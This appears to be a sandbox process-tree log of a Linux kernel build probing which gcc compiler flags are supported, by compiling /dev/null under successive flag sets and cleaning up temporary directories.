/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -m16 -g -Os -DDISABLE_BRANCH_PROFILING -Wall -Wstrict-prototypes -march=i386 -mregparm=3 -fno-strict-aliasing -fomit-frame-pointer -fno-pic -mno-mmx -mno-sse -fcf-protection=none -ffreestanding -fno-stack-protector -Wno-address-of-packed-member -mpreferred-stack-boundary=2 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -mpreferred-stack-boundary=2\"; else echo \"\"; fi"3⤵PID:1592
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_15924⤵PID:1593
-
-
/usr/bin/gccgcc -Werror -m16 -g -Os -DDISABLE_BRANCH_PROFILING -Wall -Wstrict-prototypes "-march=i386" "-mregparm=3" -fno-strict-aliasing -fomit-frame-pointer -fno-pic -mno-mmx -mno-sse "-fcf-protection=none" -ffreestanding -fno-stack-protector -Wno-address-of-packed-member "-mpreferred-stack-boundary=2" -c -x c /dev/null -o /tmp/a/.tmp_1592/tmp4⤵PID:1594
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D DISABLE_BRANCH_PROFILING /dev/null -quiet -dumpbase null -m16 "-march=i386" "-mregparm=3" -mno-mmx -mno-sse "-mpreferred-stack-boundary=2" -auxbase-strip /tmp/a/.tmp_1592/tmp -g -Os -Werror -Wall -Wstrict-prototypes -Wno-address-of-packed-member -fno-strict-aliasing -fomit-frame-pointer -fno-pic "-fcf-protection=none" -ffreestanding -fno-stack-protector -fasynchronous-unwind-tables -Wformat-security -fstack-clash-protection -o /tmp/ccu9GW5G.s5⤵PID:1595
-
-
/usr/local/sbin/asas --32 -o /tmp/a/.tmp_1592/tmp /tmp/ccu9GW5G.s5⤵PID:1596
-
-
/usr/local/bin/asas --32 -o /tmp/a/.tmp_1592/tmp /tmp/ccu9GW5G.s5⤵PID:1596
-
-
/usr/sbin/asas --32 -o /tmp/a/.tmp_1592/tmp /tmp/ccu9GW5G.s5⤵PID:1596
-
-
/usr/bin/asas --32 -o /tmp/a/.tmp_1592/tmp /tmp/ccu9GW5G.s5⤵PID:1596
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_15924⤵PID:1597
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mno-avx\"; else echo \"\"; fi"3⤵PID:1598
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_15984⤵PID:1599
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -c -x c /dev/null -o /tmp/a/.tmp_1598/tmp4⤵PID:1600
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1598/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection -o /tmp/ccQS9MJd.s5⤵PID:1601
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1598/tmp /tmp/ccQS9MJd.s5⤵PID:1602
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1598/tmp /tmp/ccQS9MJd.s5⤵PID:1602
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1598/tmp /tmp/ccQS9MJd.s5⤵PID:1602
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1598/tmp /tmp/ccQS9MJd.s5⤵PID:1602
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_15984⤵PID:1603
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fcf-protection=none\"; else echo \"\"; fi"3⤵PID:1604
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16044⤵PID:1605
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -c -x c /dev/null -o /tmp/a/.tmp_1604/tmp4⤵PID:1606
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1604/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/ccPRlgzD.s5⤵PID:1607
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1604/tmp /tmp/ccPRlgzD.s5⤵PID:1608
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1604/tmp /tmp/ccPRlgzD.s5⤵PID:1608
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1604/tmp /tmp/ccPRlgzD.s5⤵PID:1608
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1604/tmp /tmp/ccPRlgzD.s5⤵
- Writes file to tmp directory
PID:1608
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16044⤵PID:1609
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-falign-jumps=1\"; else echo \"\"; fi"3⤵PID:1610
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16104⤵
- Reads runtime system information
PID:1611
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" -c -x c /dev/null -o /tmp/a/.tmp_1610/tmp4⤵
- Writes file to tmp directory
PID:1612 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1610/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/ccnvuwl6.s5⤵PID:1613
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1610/tmp /tmp/ccnvuwl6.s5⤵PID:1614
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1610/tmp /tmp/ccnvuwl6.s5⤵PID:1614
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1610/tmp /tmp/ccnvuwl6.s5⤵PID:1614
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1610/tmp /tmp/ccnvuwl6.s5⤵PID:1614
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16104⤵PID:1615
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-falign-loops=1\"; else echo \"\"; fi"3⤵PID:1616
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16164⤵PID:1617
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -c -x c /dev/null -o /tmp/a/.tmp_1616/tmp4⤵
- Writes file to tmp directory
PID:1618 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1616/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/cckKJ2rw.s5⤵PID:1619
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1616/tmp /tmp/cckKJ2rw.s5⤵PID:1620
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1616/tmp /tmp/cckKJ2rw.s5⤵PID:1620
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1616/tmp /tmp/cckKJ2rw.s5⤵PID:1620
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1616/tmp /tmp/cckKJ2rw.s5⤵
- Writes file to tmp directory
PID:1620
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16164⤵PID:1621
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mno-80387\"; else echo \"\"; fi"3⤵PID:1622
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16224⤵PID:1623
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -c -x c /dev/null -o /tmp/a/.tmp_1622/tmp4⤵PID:1624
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1622/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/ccC9LQ10.s5⤵
- Writes file to tmp directory
PID:1625
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1622/tmp /tmp/ccC9LQ10.s5⤵PID:1626
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1622/tmp /tmp/ccC9LQ10.s5⤵PID:1626
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1622/tmp /tmp/ccC9LQ10.s5⤵PID:1626
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1622/tmp /tmp/ccC9LQ10.s5⤵
- Writes file to tmp directory
PID:1626
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16224⤵PID:1627
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mno-fp-ret-in-387\"; else echo \"\"; fi"3⤵PID:1628
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16284⤵PID:1629
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 -c -x c /dev/null -o /tmp/a/.tmp_1628/tmp4⤵
- Writes file to tmp directory
PID:1630 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1628/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/ccMq6sjt.s5⤵PID:1631
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1628/tmp /tmp/ccMq6sjt.s5⤵PID:1632
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1628/tmp /tmp/ccMq6sjt.s5⤵PID:1632
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1628/tmp /tmp/ccMq6sjt.s5⤵PID:1632
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1628/tmp /tmp/ccMq6sjt.s5⤵PID:1632
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16284⤵PID:1633
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mpreferred-stack-boundary=3\"; else echo \"\"; fi"3⤵PID:1634
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16344⤵PID:1635
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -c -x c /dev/null -o /tmp/a/.tmp_1634/tmp4⤵
- Writes file to tmp directory
PID:1636 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1634/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/cc4jPfnS.s5⤵PID:1637
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1634/tmp /tmp/cc4jPfnS.s5⤵PID:1638
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1634/tmp /tmp/cc4jPfnS.s5⤵PID:1638
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1634/tmp /tmp/cc4jPfnS.s5⤵PID:1638
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1634/tmp /tmp/cc4jPfnS.s5⤵
- Writes file to tmp directory
PID:1638
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16344⤵PID:1639
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mskip-rax-setup\"; else echo \"\"; fi"3⤵PID:1640
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16404⤵PID:1641
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup -c -x c /dev/null -o /tmp/a/.tmp_1640/tmp4⤵
- Writes file to tmp directory
PID:1642 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1640/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/cckd5cmo.s5⤵
- Writes file to tmp directory
PID:1643
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1640/tmp /tmp/cckd5cmo.s5⤵PID:1644
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1640/tmp /tmp/cckd5cmo.s5⤵PID:1644
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1640/tmp /tmp/cckd5cmo.s5⤵PID:1644
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1640/tmp /tmp/cckd5cmo.s5⤵PID:1644
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16404⤵PID:1645
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mtune=generic\"; else echo \"\"; fi"3⤵PID:1646
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16464⤵PID:1647
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -c -x c /dev/null -o /tmp/a/.tmp_1646/tmp4⤵PID:1648
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1646/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/ccpPsfPN.s5⤵
- Writes file to tmp directory
PID:1649
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1646/tmp /tmp/ccpPsfPN.s5⤵PID:1650
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1646/tmp /tmp/ccpPsfPN.s5⤵PID:1650
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1646/tmp /tmp/ccpPsfPN.s5⤵PID:1650
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1646/tmp /tmp/ccpPsfPN.s5⤵
- Writes file to tmp directory
PID:1650
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16464⤵PID:1651
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( /bin/echo -e '1: .quad 1b' | gcc -D__ASSEMBLY__ -fno-PIE -m64 -c -x assembler -o \"\$TMP\" - && objcopy -O elf32-x86-64 \"\$TMP\" \"\$TMPO\" && ld -m elf32_x86_64 \"\$TMPO\" -o \"\$TMP\") >/dev/null 2>&1; then echo \"y\"; else echo \"n\"; fi"3⤵PID:1652
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16524⤵PID:1653
-
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -c -x assembler -o /tmp/a/.tmp_1652/tmp -4⤵PID:1656
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1652/tmp -5⤵PID:1657
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1652/tmp -5⤵PID:1657
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1652/tmp -5⤵PID:1657
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1652/tmp -5⤵PID:1657
-
-
-
